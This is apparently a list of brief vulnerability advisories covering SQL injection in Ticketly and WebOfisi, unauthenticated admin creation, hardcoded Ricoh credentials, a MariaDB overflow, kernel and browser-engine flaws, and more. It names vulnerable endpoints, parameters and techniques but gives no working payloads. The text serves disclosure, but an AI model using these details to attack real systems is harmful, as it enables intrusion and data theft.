Ticketly 1.0 are affected by SQL Injection in multiple parameters and resources through POST. This allows a attacker to read and modify sensitive information from the database used by the application. Proof of concept (PoC) includes two POST requests, one generating an error 500 and the other generating a code 200 OK. Payloads include a boolean-based blind and an error-based payload.
MariaDB uses environment variables. The PAGER variable is vulnerable to a bufferoverflow. If the environment variable PAGER is greater or equals 512 characters it will crash and make client unusable. This is caused by a the function strmov which takes all from source and copy that into destination which have a fixed size.
Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for Android give access to any externally disclosed myPrint WSDL API, as demonstrated by discovering API secrets of related Google cloud printers, encrypted passwords of mail servers and names of printed files.
WebOfisi E-Ticaret V4 is a professional online shopping script with many features. Vulnerabilities have been discovered during penetration testing. The vulnerability is a SQL injection in the 'urun' parameter of the 'arama.html' page. The payloads used to exploit the vulnerability are boolean-based blind, error-based, stacked queries, and AND/OR time-based blind.
The CherryFramework Cherry theme 3.1.4 for WordPress allow remote attackers to obtain potentially sensitive information via wp-content/themes/CherryFramework/admin/data_management/ download_backup.php because it offers the option of a ZIP archive containing the entire content of the wp-content/themes directory.
Ticketly version 1.0 are affected by a privilege escalation vulnerability, an attacker could create an administrator user account by sending a POST request to the resource /action/add_user.php without authentication.
This exploit is a proof of concept for a denial of service vulnerability in MacOS 10.13 and iOS 11. The exploit uses the workq_kernreturn syscall to cause a panic in the system. The exploit is triggered by calling the workq_kernreturn syscall with the WQOPS_THREAD_WORKLOOP_RETURN option and any non-zero address.
POC Generator is a bash script that can be used to generate a proof-of-concept (POC) for a buffer overflow vulnerability. It takes a width and height as parameters and creates an XBM file with the given dimensions. It then modifies the XBM file to contain a buffer overflow payload. If the 'minimal' parameter is given, the script will shrink the payload to the minimal body size.
Since the patch for CVE-2018-8372, it checks all inputs to native arrays, and if any input equals to the MissingItem value which can cause type confusion, it starts the bailout process. But it doesn't check the "value" argument to OP_Memset. This can be exploited in the same way as for issue 1581.
This vulnerability allows an attacker to gain the ability to override DAC security controls on files whose IDs aren't mapped in the user namespace. This is due to the fact that the new code omits the ID transformation for the kernel->namespaced mapping; only the namespaced->kernel mapping is transformed appropriately.
Services By CQR